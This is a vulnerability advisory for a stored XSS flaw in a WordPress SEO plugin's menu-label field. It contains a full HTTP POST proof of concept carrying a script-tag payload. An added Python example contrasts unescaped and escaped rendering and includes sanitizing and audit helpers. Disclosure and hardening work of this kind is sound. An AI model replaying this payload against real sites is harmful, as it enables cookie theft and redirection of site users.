Wednesday, August 13, 2014

All In One SEO Pack v.2.2.2 Stored XSS
Author: 1N3
Website: http://xerosecurity.com
Vendor Website: https://wordpress.org/plugins/all-in-one-seo-pack/
Affected Product: All In One SEO Pack
Affected Version: 2.2.2

ABOUT:

All in One SEO Pack is a WordPress SEO plugin that automatically optimizes a WordPress blog for search engines such as Google. Version 2.2.2 suffers from a stored cross-site scripting (XSS) vulnerability in the “/wp-admin/post.php” page because it fails to properly sanitize the “aiosp_menulabel” form field. A malicious author or administrator of a site could use this flaw to silently redirect the site's users to a malicious site or to steal other users' session cookies.

NOTE: The user must have the ability to publish pages on the affected WordPress site (usually the Author or Admin role is required).

POC:
http://localhost/wordpress/wp-admin/post.php?post_type=page

Host=localhost
User-Agent=Mozilla/5.0 (X11; Linux x86_64; rv:24.0) Gecko/20140722 Firefox/24.0 Iceweasel/24.7.0
Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language=en-US,en;q=0.5
Accept-Encoding=gzip, deflate
Referer=http://localhost/wordpress/wp-admin/post-new.php?post_type=page
Cookie=wp-saving-post-107=check; wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1408112201%7C5eb50362019f43eae995f2e48c5227f4; wp-settings-1=editor%3Dhtml; wp-settings-time-1=1407939753; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=admin%7C1408112201%7C0a5ac5bc9c15db1b47d703678928b5be; PHPSESSID=oibbnvob8bp761ep58hlijji23; bp-activity-oldestpage=1
Content-Type=application/x-www-form-urlencoded
Content-Length=1856

POSTDATA=_wpnonce=6da01af260&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dpage&user_ID=1&action=editpost&originalaction=editpost&post_author=1&post_type=page&original_post_status=auto-draft&referredby=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D105%26action%3Dedit%26message%3D6&_wp_original_http_referer=http%3A%2F%2Flocalhost%2Fwordpress%2Fwp-admin%2Fpost.php%3Fpost%3D105%26action%3Dedit%26message%3D6&auto_draft=&post_ID=107&meta-box-order-nonce=a33dd2a867&closedpostboxesnonce=e5ec4ba0bf&post_title=XSS2&samplepermalinknonce=12c1ea009d&content=XSS2&mobile_template_box_nonce=704c3cc317&_wp_http_referer=%2Fwordpress%2Fwp-admin%2Fpost-new.php%3Fpost_type%3Dpage&wptouch_mobile_page_template=Default+Template&wp-preview=&hidden_post_status=draft&post_status=draft&hidden_post_password=&hidden_post_visibility=public&visibility=public&post_password=&mm=08&jj=13&aa=2014&hh=10&mn=29&ss=11&hidden_mm=08&cur_mm=08&hidden_jj=13&cur_jj=13&hidden_aa=2014&cur_aa=2014&hidden_hh=10&cur_hh=10&hidden_mn=29&cur_mn=29&original_publish=Publish&publish=Publish&parent_id=&page_template=default&menu_order=0&yoast_wpseo_focuskw=&yoast_wpseo_title=&yoast_wpseo_metadesc=&yoast_wpseo_meta-robots-noindex=0&yoast_wpseo_sitemap-include=-&yoast_wpseo_sitemap-prio=-&yoast_wpseo_sitemap-html-include=-&yoast_wpseo_authorship=-&yoast_wpseo_canonical=&yoast_wpseo_redirect=&yoast_wpseo_opengraph-description=&yoast_wpseo_opengraph-image=&yoast_wpseo_google-plus-description=&metakeyselect=%23NONE%23&metakeyinput=&metavalue=&_ajax_nonce-add-meta=85af917bd6&advanced_view=1&comment_status=open&ping_status=open&post_name=&post_author_override=1&aiosp_edit=aiosp_edit&nonce-aioseop-edit=d33cea6040&aiosp_title=&length1=0&aiosp_description=&length2=0&aiosp_keywords=&aiosp_titleatr=&aiosp_menulabel=%3Cscript%3Ealert%288%29%3B%3C%2Fscript%3E
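The defect class and its fix, as an added Python example that is not part of this advisory or of the plugin's code: it decodes the aiosp_menulabel value from the PoC body above, renders it through a hypothetical raw template and through the same template with output encoding, and adds an approximation of sanitize-on-save. The render functions, sanitize_on_save and contains_markup are illustrative stand-ins, not the plugin's templates or WordPress APIs.

```python
import html
import re
from urllib.parse import parse_qs

# Constructed excerpt of the PoC POST body: only the fields relevant here.
POC_BODY = (
    "post_ID=107&post_title=XSS2&aiosp_edit=aiosp_edit"
    "&aiosp_menulabel=%3Cscript%3Ealert%288%29%3B%3C%2Fscript%3E"
)


def menulabel_from_body(body: str) -> str:
    """Decode the aiosp_menulabel field from a form-encoded request body."""
    fields = parse_qs(body, keep_blank_values=True)
    return fields.get("aiosp_menulabel", [""])[0]


def render_vulnerable(label: str) -> str:
    """Hypothetical template that echoes the stored label into HTML unchanged.
    This is the defect class the advisory describes, not the plugin's code."""
    return '<li class="menu-item">' + label + "</li>"


def render_hardened(label: str) -> str:
    """Same template with output encoding for an HTML text context
    (the WordPress equivalent is esc_html())."""
    return '<li class="menu-item">' + html.escape(label, quote=True) + "</li>"


def sanitize_on_save(value: str) -> str:
    """Defense in depth at write time: strip tags and surrounding whitespace,
    roughly what WordPress's sanitize_text_field() does. Output encoding at
    render time is still required; this alone is not the fix."""
    return re.sub(r"<[^>]*>", "", value).strip()


def contains_markup(value: str) -> bool:
    """Audit helper for already-stored values: flag HTML metacharacters."""
    return any(ch in value for ch in "<>\"'&")


if __name__ == "__main__":
    label = menulabel_from_body(POC_BODY)
    print("stored value :", label)
    print("vulnerable   :", render_vulnerable(label))
    print("hardened     :", render_hardened(label))
    print("sanitized    :", sanitize_on_save(label))
    print("flagged      :", contains_markup(label))
```

Running contains_markup over existing page meta is one way to find labels that were stored before the plugin was patched.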